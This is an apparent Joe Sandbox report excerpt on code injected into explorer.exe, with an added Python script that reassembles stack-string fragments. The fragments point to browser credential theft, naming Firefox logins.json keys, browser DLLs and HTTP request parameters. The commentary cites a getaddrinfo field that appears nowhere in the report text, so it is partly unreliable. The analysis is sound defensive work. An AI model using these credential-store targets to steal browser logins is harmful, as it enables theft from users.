• Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
• Instruction ID: 02adfeb3afd655f0df1befddd8c98eb5eecb60066e3af308dab57c46f4e1c457
• Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
• Instruction Fuzzy Hash: A4316BB4A08B09EFDB64EF6980882A5F7A1FB54701F44427EC92DCB206DB749664CF91

Control-flow Graph
control_flow_graph 440 b136412-b136446 call b141942 443 b136473-b13647d 440->443 444 b136448-b136472 call b143c9e CreateThread 440->444
APIs
Memory Dump Source
• Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
• Instruction ID: 3ca5d9490665baf858fcdff389ae90b9d246fadf00c6407afa37a87c4852a0fa
• Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
• Instruction Fuzzy Hash: F4F0F630668A484FD788EF2CD44563AF3E0FBE8215F45063EE54DC3264DB39C5814716

Strings
Memory Dump Source
• Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
• API String ID: 0-393284711
• Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction ID: 282282a5a2f9fad6d76191d69fb5a7471a95ea7cf1203ba9faadab3039e94c66
• Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction Fuzzy Hash: C8E14874618B488FC7A4DF68D4867AAB7E0FB58300F904A2EA59FC7245DF34E541CB89

Strings
Memory Dump Source
• Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
Similarity
• API ID:
• String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
• API String ID: 0-2916316912
• Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction ID: 7c5fbfc668a9897eed6290860b9edcacd1453f2067a7e4a2d8f583e6e4d1cd1b
• Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction Fuzzy Hash: 87B18D30518B488EDB55DF68D486AEEB7F1FF98300F90452EE49AC7251EF74E4098B86
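The "String ID" fields above (for the CreateMutex, getaddrinfo and ObtainUserAgentString functions and for the preceding function with no API reference) list the string immediates the Joe Sandbox IDA plugin recovered from each function, joined with `$`. Almost all of them are four bytes or shorter, which is what a string assembled on the stack with 32-bit immediate moves looks like after disassembly: `kern`, `el32`, `.dll` rather than `kernel32.dll`. The following script is an added example, not part of the report or of Joe Sandbox: it parses those fields as copied from this page, flags fields whose fragments all fit a DWORD, and tests whether the fragments can be concatenated into candidate strings. The candidate lists (a module name, an HTTP header and request parameters, and the key names of Firefox's logins.json credential store) are assumptions made for illustration; the report itself does not name the strings the fragments form.

```python
"""Reassemble fragmented string immediates from Joe Sandbox "String ID" fields.

Added example; not part of the Joe Sandbox report. STRING_ID_FIELDS are copied from
the report's "String ID" lines; CANDIDATES are assumed targets chosen for illustration.
"""
from typing import Dict, List, Optional

# Copied from this report (the IDA plugin joins recovered string immediates with '$').
STRING_ID_FIELDS: Dict[str, str] = {
    "CreateMutex": ".dll$el32$kern",
    "getaddrinfo": "Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion",
    "ObtainUserAgentString": "User-Agent: $nt: $on.d$urlmon.dll",
    "no-api/credential-keys": "Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte",
}

# Assumed targets (not stated in the report): a module name, an HTTP header plus
# request parameters, and the key names used in Firefox's logins.json.
CANDIDATES: Dict[str, List[str]] = {
    "CreateMutex": ["kernel32.dll"],
    "getaddrinfo": ["Connection: close", "GET ", "dat=", "&un=", "&br=", "&sql"],
    "ObtainUserAgentString": ["User-Agent: ", "urlmon.dll"],
    "no-api/credential-keys": [
        "encryptedUsername", "encryptedPassword", "usernameField",
        "passwordField", "formSubmitURL", "hostname", "guid",
    ],
}

DWORD = 4  # a `mov dword` immediate carries at most four characters of a stack string


def split_string_id(field: str) -> List[str]:
    """Split a String ID field into fragments, keeping spaces and punctuation."""
    return [f for f in field.split("$") if f]


def looks_like_stack_strings(fragments: List[str]) -> bool:
    """Heuristic: every recovered fragment fits in one DWORD immediate."""
    return bool(fragments) and all(len(f) <= DWORD for f in fragments)


def tile(target: str, fragments: List[str]) -> Optional[List[str]]:
    """Cover `target` exactly, left to right, with fragments (reuse allowed,
    backtracking on dead ends). Returns the fragment sequence, or None if the
    fragments cannot spell the target."""
    if target == "":
        return []
    for frag in fragments:
        if target.startswith(frag):
            rest = tile(target[len(frag):], fragments)
            if rest is not None:
                return [frag] + rest
    return None


def reassemble(field: str, candidates: List[str]) -> Dict[str, Optional[List[str]]]:
    """Map each candidate to the fragment sequence that spells it, or None."""
    fragments = split_string_id(field)
    return {c: tile(c, fragments) for c in candidates}


def analyse_report(fields: Dict[str, str] = STRING_ID_FIELDS,
                   candidates: Dict[str, List[str]] = CANDIDATES) -> Dict[str, dict]:
    """Per function: stack-string verdict and the candidates its fragments spell."""
    result: Dict[str, dict] = {}
    for name, field in fields.items():
        frags = split_string_id(field)
        matched = [c for c, seq in reassemble(field, candidates[name]).items() if seq]
        result[name] = {
            "stack_strings": looks_like_stack_strings(frags),
            "matched": sorted(matched),
        }
    return result


if __name__ == "__main__":
    for name, info in analyse_report().items():
        print(f"{name}: stack_strings={info['stack_strings']} matched={info['matched']}")
```

Reuse of fragments is deliberate: the plugin lists `encr` and `ypte` twice but `d` only once, so consuming fragments as a multiset would wrongly reject one of the two strings that end in `d`. A candidate that cannot be tiled (here `formSubmitURL`, which would need an `L` fragment the report does not list) is reported as None rather than guessed.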
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                              • API String ID: 0-1539916866
                                                              • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                              • Instruction ID: 67c0b46d8f3fcdaf9355af794abf08566cba583d9acbede33fd082eac99549f6
                                                              • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                              • Instruction Fuzzy Hash: 5D419070A18B08CBDB14DF88B44A6AD7BE2FB48B00F40026EE809D7245DBB5DD458BD6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                              • API String ID: 0-355182820
                                                              • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                              • Instruction ID: d2722d51adbc53c70cde8bfd189aafe743027a6ff66be9ccd5c935d41b8df742
                                                              • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                              • Instruction Fuzzy Hash: E3C17A74618B088BC758EF64E486ADAF3E5FB94304F80462AA49EC7250DF74E615CBC6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                              • API String ID: 0-97273177
                                                              • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                              • Instruction ID: b7e1b3b8bfadb72ce0527d3acb760fffba7d6ed3296c46436019c103e1097e08
                                                              • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                              • Instruction Fuzzy Hash: E751E6305187488FD709DF18D4822AAB7E5FBC4300F901A2EE8CBC7251DBB4D946CB82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                              • API String ID: 0-639201278
                                                              • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                              • Instruction ID: fc2451038f8dbba78124f3839ef886c5480e89bb5faa716f503a15b5c0b9a9df
                                                              • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                              • Instruction Fuzzy Hash: A0C1A274618A194FC748EF28E497AAAB3E1FB98300F91432DA44EC7254DF34EA45CBC5
                                                              Strings
                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                              Strings
                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                              Strings
                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                              Strings
                                                              • String ID: $.$e$n$v
                                                              Strings
                                                              • String ID: 2.dl$dll$l32.$ole3$shel
                                                              Strings
                                                              • String ID: 4$\$dll$ion.$vers
                                                              Strings
                                                              • String ID: 32.d$cli.$dll$sspi$user
                                                              Strings
                                                              • String ID: .dll$el32$h$kern
                                                              Strings
                                                              • String ID: $Snif$f fr$om:
                                                              Strings
                                                              • String ID: $Snif$f fr$om:
                                                              Strings
                                                              • String ID: .dll$chro$hild$me_c
                                                              Strings
                                                              • String ID: .dll$chro$hild$me_c
                                                              Strings
                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                              Strings
                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                              Strings
                                                              • String ID: .$l$l$t
                                                              Strings
                                                              • String ID: .$l$l$t
                                                              Strings
                                                              • String ID: auth$logi$pass$user